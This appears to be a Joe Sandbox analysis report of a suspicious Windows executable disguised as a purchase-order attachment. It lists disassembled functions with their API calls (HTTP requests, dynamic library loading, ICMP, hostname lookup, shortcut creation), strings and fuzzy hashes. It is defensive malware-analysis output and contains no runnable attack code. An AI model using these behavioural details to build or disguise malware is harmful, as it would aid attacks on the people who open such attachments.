Function 0044A7DC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A7FE
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A851
HttpQueryInfoW.WININET ref: 0044A892

Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880

Strings

, xrefs: 0044A88A

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
String ID:
API String ID: 3705125965-3916222277
Opcode ID: 978b0a3adb57e12b693652f0a59e9f67067917ae502be6042813f4078819ed5c
Instruction ID: e2ea4e726a01332d61d4ddbc0b4be6fd5f15ca60b5c099a75bcf819f780d651a
Opcode Fuzzy Hash: 978b0a3adb57e12b693652f0a59e9f67067917ae502be6042813f4078819ed5c
Instruction Fuzzy Hash: F431C6B56813416BE320EB16DC42F9FB7E8EFD9714F00091FF65057281D7A8A50D876A

Function 004509D1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00450A84
GetWindowLongW.USER32(?,000000F0), ref: 00450AA2
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00450AB3

Strings

SysTreeView32, xrefs: 00450A53

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 8beaa76caf08e9d8622144d4cb1fe8de975b1c4a0fa94bb7914df260c0b4a9df
Instruction ID: 1ec52148e0427fd314aa46f8515fbaae5756f8dde681787cc4d1a4a364837cef
Opcode Fuzzy Hash: 8beaa76caf08e9d8622144d4cb1fe8de975b1c4a0fa94bb7914df260c0b4a9df
Instruction Fuzzy Hash: 9831E670244301AFE710DB64CC84B6BB3E8EF98325F104A1EF9A5932D1D7B8AD85CB25

Function 00437CA6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 107libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?), ref: 00437CB2
GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00437D26
FreeLibrary.KERNEL32(?,?,AU3_GetPluginDetails), ref: 00437D3D

Strings

AU3_GetPluginDetails, xrefs: 00437D20

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: AU3_GetPluginDetails
API String ID: 145871493-4132174516
Opcode ID: 243c63b0a1642fd37fbdc6bb7a016f54d23cec52ba8901b0b69bd5fd37109442
Instruction ID: 909018a8305b4cb0ce841e730e5bf8c258fddf5044228ae68d4d210ccee2088c
Opcode Fuzzy Hash: 243c63b0a1642fd37fbdc6bb7a016f54d23cec52ba8901b0b69bd5fd37109442
Instruction Fuzzy Hash: 054147B96042019FC314DF68D8C4D5AF3E5FF8D304B20866EE9568B751DB35E802CB96

Function 00450C09 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,004A83D8,00000000,?,?), ref: 00450C60

Strings

msctls_updown32, xrefs: 00450C44

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: DestroyWindow
String ID: msctls_updown32
API String ID: 3375834691-2298589950
Opcode ID: 2a2b7300f3f0896f723b2acc27284ae87319393b418436251cb0663837fc8f9c
Instruction ID: 6a1e1189e42626fde14bc74b9d87f1f450c181bb0fe7a510af516aef360d3f61
Opcode Fuzzy Hash: 2a2b7300f3f0896f723b2acc27284ae87319393b418436251cb0663837fc8f9c
Instruction Fuzzy Hash: CE31A279300201AFD624DF54DC81F5B73A9EB9A714F20451EF640AB382C7B4AC4ACB6A

Function 00451191 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 0045122A
SendMessageW.USER32(00000000,00000186,00000000,00000000), ref: 00451238
MoveWindow.USER32(?,?,00000000,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 0045125D

Strings

Listbox, xrefs: 004511F6

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: ec94c338bdc408a6213732be15a93177a4dce0f95fa1299e59073e0341a0244e
Instruction ID: bfe1e9b3800f224edd0053b2d0d87a77da448e7bf5b17050dc61905274d7532a
Opcode Fuzzy Hash: ec94c338bdc408a6213732be15a93177a4dce0f95fa1299e59073e0341a0244e
Instruction Fuzzy Hash: E421D3712043047BE6209A65DC81F6BB3E8EBCD735F104B1EFA60A72D1C675EC458729

Function 0045D235 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0045D243
GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D2C7
SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D30C

Strings

HH, xrefs: 0045D2E3

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: HH
API String ID: 2507767853-2761332787
Opcode ID: 10a78899cac0a24ca5bd241ff5c46140465ea67f957306f93882c0fc43b3d187
Instruction ID: 4a708fd112bc3492f79fb502a293ca5b83a6a9b53d4ab80d782c21126568c1ab
Opcode Fuzzy Hash: 10a78899cac0a24ca5bd241ff5c46140465ea67f957306f93882c0fc43b3d187
Instruction Fuzzy Hash: 622148756083019FC310EF55D944A6BB7E4FF88704F40882EFA45972A2D774E909CB5A

Function 0045D42B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0045D44A
GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CE
SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D502

Strings

HH, xrefs: 0045D43C

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: HH
API String ID: 2507767853-2761332787
Opcode ID: a403ffe69dae12f4374470e721856d745e9457d8bcd1b2c0f65575075c8e6c3b
Instruction ID: 8e4373afe1f51974a95c06a3ae407364d3098df30383bdf5f9e51316f0e0b5c8
Opcode Fuzzy Hash: a403ffe69dae12f4374470e721856d745e9457d8bcd1b2c0f65575075c8e6c3b
Instruction Fuzzy Hash: 902137756083019FC314EF55D944A5AB7E8FF88710F40882EFA49972A2D778E909CB9A

Function 00450D00 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450D74
SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450D8A
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450D98

Strings

msctls_trackbar32, xrefs: 00450D4A

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: e14717e3cb06623c4553287ca90ea840a6fcf4d017620d4062bb11778db8dfcd
Instruction ID: c83169f0c5ec68c29a3e9aa847b4a28030a04f73c00385235601d1c9d4ce90e2
Opcode Fuzzy Hash: e14717e3cb06623c4553287ca90ea840a6fcf4d017620d4062bb11778db8dfcd
Instruction Fuzzy Hash: 4F1193717403117BE610CAA8DC81F5B73E8AB98B25F204A1AFA50A72C1D2B4FC458B68

Function 0046BD4D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0045EFE7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0047D14B,?,?,?,?), ref: 0045F003

gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046BD78
WSAGetLastError.WSOCK32(00000000,?,?,00000000,?,?), ref: 0046BD83
inet_ntoa.WSOCK32(00000000,?), ref: 0046BDCD

Strings

HH, xrefs: 0046BD99

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: ByteCharErrorLastMultiWidegethostbynameinet_ntoa
String ID: HH
API String ID: 1515696956-2761332787
Opcode ID: 536d88bcd2219f00ee4950b39be395ae06382d48515621a82e1548501abb3963
Instruction ID: 2fad99cf3c45da3a785a9a513efbde0c8943f1fdc9598a344110207fd9df59bd
Opcode Fuzzy Hash: 536d88bcd2219f00ee4950b39be395ae06382d48515621a82e1548501abb3963
Instruction Fuzzy Hash: E21142765043006BC744FB66D885D9FB3A8AFC4318F448C2EF945A7242DA39E949876A

Function 0046CD9A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67comCOMMON

Download Yara Rule

APIs

Part of subcall function 00442C52: _wcslen.LIBCMT ref: 00442C82

CoInitialize.OLE32(00000000), ref: 0046CE18
CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 0046CE31
CoUninitialize.OLE32 ref: 0046CE50

Strings

.lnk, xrefs: 0046CDEB, 0046CE08

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: 8095c6d59d69238af541582e7c79e2891b33013a97e816c4c493b562f1f8ea66
Instruction ID: 634f95a1702cd93f148e07eb64efb4b351689d97c5b229aafe37579347e0b37e
Opcode Fuzzy Hash: 8095c6d59d69238af541582e7c79e2891b33013a97e816c4c493b562f1f8ea66
Instruction Fuzzy Hash: E821AF312083009FC700EF55C985F5ABBF4EF89724F148A6EF9549B2E2D7B5A805CB56

Function 004497A4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734

GetMenuItemInfoW.USER32 ref: 004497EA
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00449817
DrawMenuBar.USER32 ref: 00449828

Strings

0, xrefs: 004497C2

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Menu$InfoItem$Draw_malloc
String ID: 0
API String ID: 772068139-4108050209
Opcode ID: d608b06cc8126a94f8b189079e1e99a50943cf597b9c9b58a32df480197dd29f
Instruction ID: 895394c4ac3d8cdb9511dba433443d5742fa96e32f07ab63668b9f5a94eb31d1
Opcode Fuzzy Hash: d608b06cc8126a94f8b189079e1e99a50943cf597b9c9b58a32df480197dd29f
Instruction Fuzzy Hash: 941182B16042009BF730EB55EC96FABB7A8FB91714F00452EE648CA281DB7A9445CB76

Function 004342A8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33memoryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 004342D1
CoTaskMemAlloc.OLE32(00000001,?), ref: 004342DD

Strings

hkG, xrefs: 004342AE

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: AllocTask_wcslen
String ID: hkG
API String ID: 2651040394-3610518997
Opcode ID: 13332cee77e5ed885d7d4fc6bfcacd5b22b96a16ce8d99b05f9432ebd764b12e
Instruction ID: 372044899b15e8c53ead78f1c779643819f92c4817f04f111663958edd7e2adf
Opcode Fuzzy Hash: 13332cee77e5ed885d7d4fc6bfcacd5b22b96a16ce8d99b05f9432ebd764b12e
Instruction Fuzzy Hash: DCE065736442225B97506A79AC045CBA7D8AFB0370B15482BF880E7310E278E89643E5

Function 0043416A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll), ref: 0043417A
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0043418C

Strings

kernel32.dll, xrefs: 00434175
GetSystemWow64DirectoryW, xrefs: 00434186

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: 58df7aafb5ba6d6c6a2aff3317d08040102bec91f6a73b36e13bbbd5fede489a
Instruction ID: 1a9860a365f0c849ce8c10f1c40c5c80f9dda93506fd3415c38c98a37cde1a5a
Opcode Fuzzy Hash: 58df7aafb5ba6d6c6a2aff3317d08040102bec91f6a73b36e13bbbd5fede489a
Instruction Fuzzy Hash: F9D05EB1440B039FCB109FA0D80C64BB6E4AB64301F148C2EF885B2654D7B8E8C0CBA8

Function 004343CE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(ICMP.DLL,?,00434466,?,?,00464B68,?,?,?,?,?,00000000,?,?,00000101,?), ref: 004343DE
GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004343F0

Strings

ICMP.DLL, xrefs: 004343D9
IcmpSendEcho, xrefs: 004343EA

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: ICMP.DLL$IcmpSendEcho
API String ID: 2574300362-58917771
Opcode ID: 4b46215cfc07257f28131f0af9bcf44c57d27cd5d24dcd7dc697cbf0f45d51b4
Instruction ID: bde82dd314f67bb94adb8237e566b22d9cd50c1f3059090bebd97951f1ce1dc3
Opcode Fuzzy Hash: 4b46215cfc07257f28131f0af9bcf44c57d27cd5d24dcd7dc697cbf0f45d51b4
Instruction Fuzzy Hash: C9D017B45043039BD7105B21D80874A76E4AF58310F118C2FF881E2250CBBCE8808B79

Function 004343FD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(ICMP.DLL,?,0043447D,?,?,00464B56,?,?,?,?,00000000,?,?,00000101,?,?), ref: 0043440D
GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 0043441F

Strings

IcmpCloseHandle, xrefs: 00434419
ICMP.DLL, xrefs: 00434408

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: ICMP.DLL$IcmpCloseHandle
API String ID: 2574300362-3530519716
Opcode ID: 42f9b5773da98e9266fb1162e4ae0909fe6bfc7ac22b46aa183d999fe3c035a4
Instruction ID: 815a2f2ef77883dfca24b23846b24e776c3b140ddfaf16f0983d17b56328066b
Opcode Fuzzy Hash: 42f9b5773da98e9266fb1162e4ae0909fe6bfc7ac22b46aa183d999fe3c035a4
Instruction Fuzzy Hash: 9FD017B04443129AD7106B64D80874A76E4AB68302F129C3FF881A2660C7BCA8808B39

Function 0043442C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(ICMP.DLL,?,00434494,?,?,00464A94,?), ref: 0043443C
GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 0043444E

Strings

IcmpCreateFile, xrefs: 00434448
ICMP.DLL, xrefs: 00434437

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: ICMP.DLL$IcmpCreateFile
API String ID: 2574300362-275556492
Opcode ID: aa837af65d1bad252c0530eb36f48db089182c3e5c3795977f5f1506c5c05052
Instruction ID: c247b13c068300da1972229949477068df6ba5342f41feac8fae2a533bc96115
Opcode Fuzzy Hash: aa837af65d1bad252c0530eb36f48db089182c3e5c3795977f5f1506c5c05052
Instruction Fuzzy Hash: 97D017B04043029ADB105B60D90875A77E4AB68300F118C7FF9A1A2250C7BCA8808B29

Function 0040EE70 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,0040E551,?), ref: 0040EE7B
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0040EE8D

Strings

kernel32.dll, xrefs: 0040EE76
IsWow64Process, xrefs: 0040EE87

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: IsWow64Process$kernel32.dll
API String ID: 2574300362-3024904723
Opcode ID: 16a412f97595c511ed2c9e877c1bae7dd0f808d0cf5b3a9fdd28adcf59ee176d
Instruction ID: 75875fa2f3f8b89ed4c8cde0d061cde3839b728dd3838c322d7dfd2ddbff31fa
Opcode Fuzzy Hash: 16a412f97595c511ed2c9e877c1bae7dd0f808d0cf5b3a9fdd28adcf59ee176d
Instruction Fuzzy Hash: 51D0C9B0940707DAC7301F72C91871B7AE4AB40342F204C3EB995A1290DBBCC0408B28

Function 0040ACA0 Relevance: 6.4, APIs: 4, Instructions: 368COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0042EEE5

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
